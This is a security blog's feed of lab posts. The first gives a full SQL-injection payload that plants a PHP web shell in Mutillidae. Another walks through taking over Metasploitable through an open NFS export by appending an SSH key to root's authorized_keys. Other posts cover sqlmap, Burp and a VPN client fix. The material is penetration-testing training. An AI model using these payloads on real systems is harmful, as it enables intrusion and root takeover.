tag:blogger.com,1999:blog-90467745453463113342024-03-05T19:42:28.580+03:00Bilgi Güvenliği Analizi< Information Security Analysis >Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.comBlogger49125tag:blogger.com,1999:blog-9046774545346311334.post-71527844465083342562014-04-14T17:31:00.000+03:002014-04-14T17:35:29.514+03:00Mutillidae: Inject Web Shell Backdoor via SQL Injection<div class="clearfix yt-uix-expander yt-uix-expander-collapsed" id="watch7-headline" style="border-bottom-color: rgba(0, 0, 0, 0.0980392); border-bottom-style: solid; border-right-color: rgba(0, 0, 0, 0.0980392); border-right-style: solid; border-top-color: rgba(0, 0, 0, 0.0980392); border-top-style: solid; border-width: 0px 1px 0px 0px; margin: 0px; padding: 15px 20px 9px; position: relative;">
<div class="separator" style="background-color: white; clear: both; font-family: arial, sans-serif; font-size: 12.727272033691406px; line-height: 11.818181991577148px; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/lcaqam-CyBE?feature=player_embedded' frameborder='0'></iframe></div>
<h1 class="yt" id="watch-headline-title" style="background-color: transparent; border: 0px; color: #222222; font-family: arial, sans-serif; font-size: 24px; font-weight: normal; line-height: normal; margin: 0px 0px 5px; overflow: hidden; padding: 0px; text-overflow: ellipsis; white-space: nowrap; word-wrap: normal;">
</h1>
<div style="background-color: white; font-family: arial, sans-serif; font-size: 12.727272033691406px; line-height: 11.818181991577148px;">
<span class="watch-title long-title yt-uix-expander-head" dir="ltr" style="-webkit-user-select: auto; background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; cursor: pointer; font-size: 0.9em; letter-spacing: -0.03em; margin: 0px; padding: 0px;" title="Mutillidae: Inject Web Shell Backdoor via SQL Injection"><br /></span></div>
<div style="background-color: white; font-family: arial, sans-serif; font-size: 12.727272033691406px; line-height: 11.818181991577148px;">
<span class="watch-title long-title yt-uix-expander-head" dir="ltr" style="-webkit-user-select: auto; background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; cursor: pointer; font-size: 0.9em; letter-spacing: -0.03em; margin: 0px; padding: 0px;" title="Mutillidae: Inject Web Shell Backdoor via SQL Injection"><br /></span></div>
<br /><br />Using somewhat advanced SQL injection, we inject a new PHP file into the web root of the PHP server using and SQL injection vulnearbility in Mutillidae. The injection is a command shell written in PHP that give root access to the operating system. <br /><br /><br />A harmless example;<br /><br /><br />username=' union select null,1,null,null,null INTO DUMPFILE 'test.txt' -- '&password=&login-php-submit-button=Login<br /><br />The backdoor;<br /><br />' union select null,null,null,'<form action="" method="post" enctype="application/x-www-form-urlencoded"><table style="margin-left:auto; margin-right:auto;"><tr><td colspan="2">Please enter system command</td></tr><tr><td></td></tr><tr><td class="label">Command</td><td><input type="text" name="pCommand" size="50"></td></tr><tr><td></td></tr><tr><td colspan="2" style="text-align:center;"><input type="submit" value="Execute Command" /></td></tr></table></form><?php echo "<pre>";echo shell_exec($_REQUEST["pCommand"]);echo "</pre>"; ?>' INTO DUMPFILE '..\\..\\htdocs\\mutillidae\\backdoor.php' -- <br /><br /><br /><br /><div>
<span class="watch-title long-title yt-uix-expander-head" dir="ltr" style="-webkit-user-select: auto; background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; cursor: pointer; font-size: 0.9em; letter-spacing: -0.03em; margin: 0px; padding: 0px;" title="Mutillidae: Inject Web Shell Backdoor via SQL Injection"><span style="font-family: Arial; font-size: 12px; letter-spacing: normal; line-height: 10.40000057220459px; text-align: -webkit-center;">Hurray!</span></span></div>
</div>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0Europe53.247176032267333 -6.315950453281402652.009303532267332 -8.8977374532814029 54.485048532267335 -3.7341634532814028tag:blogger.com,1999:blog-9046774545346311334.post-52260656537373406892014-04-11T12:44:00.000+03:002014-04-11T17:06:55.457+03:00SQL Injection using SQLMap to Dump Some Cool Stuff (mutillidae)<br />
After you get the HTTP request from burp suite to a text file, then we can use that file in SQLMap to begin injection.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX7OSg3VcnIRyuuO8sH4i9H2D1C6Gqh9EqdjNrWzFamTguXE_OJNnD0ovTrNjA07btbX98MwmZOxKnfFCCMqroUzn0rBFHKF6V7jDXLNftG772iZ_yJg1GiOVmr4mZPWDN_MgI-f0lsjhP/s1600/sqlmap1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX7OSg3VcnIRyuuO8sH4i9H2D1C6Gqh9EqdjNrWzFamTguXE_OJNnD0ovTrNjA07btbX98MwmZOxKnfFCCMqroUzn0rBFHKF6V7jDXLNftG772iZ_yJg1GiOVmr4mZPWDN_MgI-f0lsjhP/s1600/sqlmap1.PNG" height="16" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO_Xlx82Jy65NO3LSdCWhEUI4wJSXcc-hJGkUMgzp92XrGw93zF7Muvc5Tl1jdVPUtG4KvGafCtIS1_kPdIE2s6haXA67KAcdPy_MV2b2IMkQwaKFN01bmYdbOXqR4MZl3BcO3Nc6OjJyl/s1600/sqlmap2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO_Xlx82Jy65NO3LSdCWhEUI4wJSXcc-hJGkUMgzp92XrGw93zF7Muvc5Tl1jdVPUtG4KvGafCtIS1_kPdIE2s6haXA67KAcdPy_MV2b2IMkQwaKFN01bmYdbOXqR4MZl3BcO3Nc6OjJyl/s1600/sqlmap2.PNG" height="140" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwW0lLWq5XhM0e9ROhNVTwzADxL2z9gMhh6LvoeFnEnZzEBcZr5QX3ITEoJrWsCkKD0TwNAKUxqDStX_0vHs2pewP6ChtW9RGo3qhfgxZ0DrO7sbpinZee39cuebG_WLCUIw7zUOOmePfM/s1600/sqlmap3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwW0lLWq5XhM0e9ROhNVTwzADxL2z9gMhh6LvoeFnEnZzEBcZr5QX3ITEoJrWsCkKD0TwNAKUxqDStX_0vHs2pewP6ChtW9RGo3qhfgxZ0DrO7sbpinZee39cuebG_WLCUIw7zUOOmePfM/s1600/sqlmap3.PNG" height="15" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmm8ImUwC4oH2oYG8DS6uNN83B2WZs9TgG6uGA12Vp31_00bB5ZrkGmbRs23sUrRBMo8Zu_r5wIK9se4YG7rgKYP-iUh4ipFU0a2rRytASpH7NH79WZPpBXYJlZSGG3aQH8KuMI2E4xUt7/s1600/sqlmap5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmm8ImUwC4oH2oYG8DS6uNN83B2WZs9TgG6uGA12Vp31_00bB5ZrkGmbRs23sUrRBMo8Zu_r5wIK9se4YG7rgKYP-iUh4ipFU0a2rRytASpH7NH79WZPpBXYJlZSGG3aQH8KuMI2E4xUt7/s1600/sqlmap5.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN6RjvpfapK7j5TUooLDVzR8vOF5r4wp4MonVkNIJcC1UVIO1lWh5p2TCikn4GE1USupaBURSMMx3PlNcbX9X2clSg5K1gb8XWYL-SqFTsWiaSVt_VkN4fimSmsGP36FeLqQnBVyqIbgRA/s1600/sqlmap55.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN6RjvpfapK7j5TUooLDVzR8vOF5r4wp4MonVkNIJcC1UVIO1lWh5p2TCikn4GE1USupaBURSMMx3PlNcbX9X2clSg5K1gb8XWYL-SqFTsWiaSVt_VkN4fimSmsGP36FeLqQnBVyqIbgRA/s1600/sqlmap55.PNG" height="15" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdsmrNHD_WdzY3toELNM6FXtQHdPUloJGQBPw8qYOTfDLJot9snsHYxpQdE3Mae1qZco1cdJE0Ea3P9NF1d5GyjLVM2VvdttzZt6ESDM5YmT14tRObbrC9HXkApXgJlvBtJCr9ifUBG-aT/s1600/sqlmap4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdsmrNHD_WdzY3toELNM6FXtQHdPUloJGQBPw8qYOTfDLJot9snsHYxpQdE3Mae1qZco1cdJE0Ea3P9NF1d5GyjLVM2VvdttzZt6ESDM5YmT14tRObbrC9HXkApXgJlvBtJCr9ifUBG-aT/s1600/sqlmap4.PNG" height="128" width="400" /></a></div>
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-8590580405718239682014-04-11T12:20:00.002+03:002014-04-11T12:22:09.937+03:00Brute-force Authentication - Burp Suite<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/frtkNB5G3vI?feature=player_embedded' frameborder='0'></iframe></div>
<br />
Here is the basic methods to brute force a web app. I found it very clean and tidy. Nice work.Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-13620542003531933652014-04-10T18:37:00.000+03:002014-04-10T18:37:08.044+03:00Checkpoint Remote Access 'connection failed' Issue with Windows 8 or 8.1<br />
I have seen this issue in couple of clients, they were using windows 8 and windows 8.1.<br />
<br />
They tried to connect with Remote Access Client E75.30, but 'connection failed' popup displayed straight away. There are couple of SKs about duplicate IP addresses etc.<br />
<br />
Simply, <b style="font-style: italic;">Remote Access Clients E80.42 msi file</b> (MSI) is the way to go.<br />
<table border="0" cellpadding="0" cellspacing="0" style="background-color: white; color: black; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12.800000190734863px; width: 100%px;"><tbody>
<tr valign="top"><td><table border="0" cellpadding="0" cellspacing="0" style="width: 100%px;"><tbody>
<tr><td valign="top"><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="sc-surveyTitle" style="color: #0a5196; font-size: 8pt; font-weight: bold; padding: 15px 0px 5px;" valign="top">Details:</td></tr>
<tr><td class="sc-solutionDetailsTitle" style="color: #0a5196; font-size: 8pt;" valign="top">File Name:</td><td><img height="1" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="10" /></td><td class="sc-resultsDetailsNoPad" style="color: #666666; font-size: 8pt; padding: 0px; vertical-align: top;" valign="top">CP_EPS_E80.42_RAC_Windows.msi</td></tr>
<tr><td class="sc-solutionDetailsTitle" style="color: #0a5196; font-size: 8pt;" valign="top">Product:</td><td><img height="1" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="10" /></td><td class="sc-resultsDetailsNoPad" style="color: #666666; font-size: 8pt; padding: 0px; vertical-align: top;" valign="top">Endpoint Security VPN</td></tr>
<tr><td class="sc-solutionDetailsTitle" style="color: #0a5196; font-size: 8pt;" valign="top">Version:</td><td><img height="1" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="10" /></td><td class="sc-resultsDetailsNoPad" style="color: #666666; font-size: 8pt; padding: 0px; vertical-align: top;" valign="top">R80</td></tr>
<tr><td class="sc-solutionDetailsTitle" style="color: #0a5196; font-size: 8pt;" valign="top">Minor Version:</td><td><img height="1" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="10" /></td><td class="sc-resultsDetailsNoPad" style="color: #666666; font-size: 8pt; padding: 0px; vertical-align: top;" valign="top">E80.42</td></tr>
<tr><td class="sc-solutionDetailsTitle" style="color: #0a5196; font-size: 8pt;" valign="top">OS:</td><td><img height="1" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="10" /></td><td class="sc-resultsDetailsNoPad" style="color: #666666; font-size: 8pt; padding: 0px; vertical-align: top;" valign="top">Windows</td></tr>
<tr><td class="sc-solutionDetailsTitle" style="color: #0a5196; font-size: 8pt;" valign="top">MD5:</td><td><img height="1" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="10" /></td><td class="sc-resultsDetailsNoPad" style="color: #666666; font-size: 8pt; padding: 0px; vertical-align: top;" valign="top">054fda63c4fcc84eeb4e465235ee5254</td></tr>
<tr><td class="sc-solutionDetailsTitle" style="color: #0a5196; font-size: 8pt;" valign="top">Size:</td><td><img height="1" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="10" /></td><td class="sc-resultsDetailsNoPad" style="color: #666666; font-size: 8pt; padding: 0px; vertical-align: top;" valign="top">15.90 MB</td></tr>
<tr><td class="sc-solutionDetailsTitle" style="color: #0a5196; font-size: 8pt;" valign="top">Date Published:</td><td><img height="1" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="10" /></td><td class="sc-resultsDetailsNoPad" style="color: #666666; font-size: 8pt; padding: 0px; vertical-align: top;" valign="top">12/10/2013</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<br />
<br />
It worked a treat.<br />
<br />
<br />
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-87135596492443424532014-03-24T17:38:00.002+02:002014-03-24T17:49:16.143+02:00Mutillidae: Basics of Web Request and Response Interception with Burp-Suite<br />
There is something more here;<br />
<br />
<ul>
<li>It explains the method to bypass the java script validation built on the client side (browser). </li>
<li>After transferring normal strings, change the strings to SQL injection on-the-fly with Burp or another proxy utility.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/qsE04AhlJrc?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
Fun stuff! :)Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-24736788036548810162014-03-19T11:48:00.002+02:002014-03-19T11:51:48.852+02:00Exposing Flash Application Vulnerabilities with SWFScan<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="https://ytimg.googleusercontent.com/vi/_bHtGD3qUVg/0.jpg"><param name="movie" value="https://youtube.googleapis.com/v/_bHtGD3qUVg&source=uds" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="https://youtube.googleapis.com/v/_bHtGD3qUVg&source=uds" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<br />
<br />
<span style="background-color: white; font-family: HPRegular, arial, sans-serif; font-size: 13.63636302947998px; line-height: 22px;">Download link on White Rabbit Blog;</span><br />
<a href="http://h30499.www3.hp.com/t5/Following-the-White-Rabbit-A/SWFScan-FREE-Flash-decompiler/ba-p/5440167" style="background-color: white; color: #5f76a5; font-family: HPRegular, arial, sans-serif; font-size: 13.63636302947998px; line-height: 22px; text-decoration: none;" target="_blank">http://h30499.www3.hp.com/t5/Following-the-White-R<wbr></wbr>abbit-A/SWFScan-FREE-Flash-decompiler/ba-p/5440167</a>Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-54763961602327645402014-03-13T17:57:00.002+02:002014-03-13T17:57:50.886+02:00sessions (msfconsole)<br />
Is there a background session?<br />
<br />
sessions<br />
<br />
.<br />
.<br />
list the sessions established<br />
.<br />
.<br />
<br />
to connect one of them<br />
<br />
sessions -i [session_id]<br />
<br />
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-79660768644385578762014-03-13T17:23:00.000+02:002014-03-13T17:24:04.624+02:00Unix Fundamentals - NFS Service / Attack Illustration <span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><b>look at the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services.</b></span><span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><b>The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.</b></span><br />
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><b><br /></b></span>
<span style="background-color: white; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px;">root@ubuntu:~# </span><strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;">rpcinfo -p 192.168.99.131</strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong>
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;">.</strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;">.</strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;">.</strong><br />
<div style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px; padding: 0px 0px 0px 30px; vertical-align: baseline;">
<span style="border: 0px; font-family: 'courier new', courier; font-size: 13.333333015441895px; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; font-family: inherit; font-size: 13.333333015441895px; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> 100003 2 tcp 2049 nfs</strong></span></div>
<div style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px; padding: 0px 0px 0px 30px; vertical-align: baseline;">
<span style="border: 0px; font-family: 'courier new', courier; font-size: 13.333333015441895px; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; font-family: inherit; font-size: 13.333333015441895px; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> 100003 3 tcp 2049 nfs</strong></span></div>
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"></strong><br />
<div style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px; padding: 0px 0px 0px 30px; vertical-align: baseline;">
<span style="border: 0px; font-family: 'courier new', courier; font-size: 13.333333015441895px; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; font-family: inherit; font-size: 13.333333015441895px; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> 100003 4 tcp 2049 nfs</strong></span></div>
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><b>.</b></span><br />
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><b>.</b></span><br />
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><b>.</b></span><br />
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><b><br /></b></span>
<span style="background-color: white; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px;">root@ubuntu:~# </span><strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;">showmount -e 192.168.99.131</strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong>
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong>
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><b><br /></b></span>
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><b>Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: </b></span><br />
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><br /></span>
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><br /></span>
<span style="background-color: white; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px;">root@ubuntu:~#</span><strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"> ssh-keygen</strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="font-size: 13.333333015441895px; font-weight: normal;">root@ubuntu:~# </span><strong style="border: 0px; font-size: 13.333333015441895px; margin: 0px; padding: 0px; vertical-align: baseline;">mkdir /tmp/r00t</strong></strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="font-size: 13.333333015441895px; font-weight: normal;">root@ubuntu:~# </span><strong style="border: 0px; font-size: 13.333333015441895px; margin: 0px; padding: 0px; vertical-align: baseline;">mount -t nfs 192.168.99.131:/ /tmp/r00t/</strong></strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="font-size: 13.333333015441895px; font-weight: normal;"><br /></span></strong>
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="font-size: 13.333333015441895px; font-weight: normal;">mount.nf: rpc.statd is not running but is required for remote locking.</span></strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="font-size: 13.333333015441895px; font-weight: normal;">mount.nfs: Either use '-o nolock' to keep locks local, or start statd. </span></strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="font-size: 13.333333015441895px; font-weight: normal;">mount.nfs: an incorrect mount option was specified.</span></strong><br />
<br />
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><br /><b>This is the message you get when you try to mount the NFS export. </b></span><br />
<br />
<b>restarting nfs-common is not enough</b><br />
<br />
<ul>
<li>service nfs-common restart</li>
</ul>
<br />
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;">restarting rpc will resolve the issue.</span><br />
<br />
<ul>
<li><span style="color: #3d3d3d; font-family: Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif; font-size: x-small;"><span style="line-height: 13px;">service rpcbind restart</span></span></li>
</ul>
<br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;">root@ubuntu:~# cat /root/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys </strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong>
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong>
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;">ssh root@192.168.99.131 </strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong>
<span style="color: #3d3d3d; font-family: courier new, courier; font-size: x-small;"><span style="background-color: white; line-height: 13px;"><b>//with the password generated on the ssh-keygen (then add our pub file -key- into the account's authorized_keys file on the remote machine), you can access to the remote system. yay. </b></span></span><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong>
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="font-size: 13.333333015441895px; font-weight: normal;">root@metasploitable:~#</span></strong><br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="font-size: 13.333333015441895px; font-weight: normal;"><br /></span></strong>
<br />
<strong style="background-color: white; border: 0px; color: #3d3d3d; font-family: 'courier new', courier; font-size: 13.333333015441895px; line-height: 13px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong>
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;">The environment include Kali and Metasploitable II.</span><br />
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;"><br /></span>
<span style="background-color: white; color: #3d3d3d; font-family: 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13.333333015441895px; line-height: 13px;">Reference:</span><br />
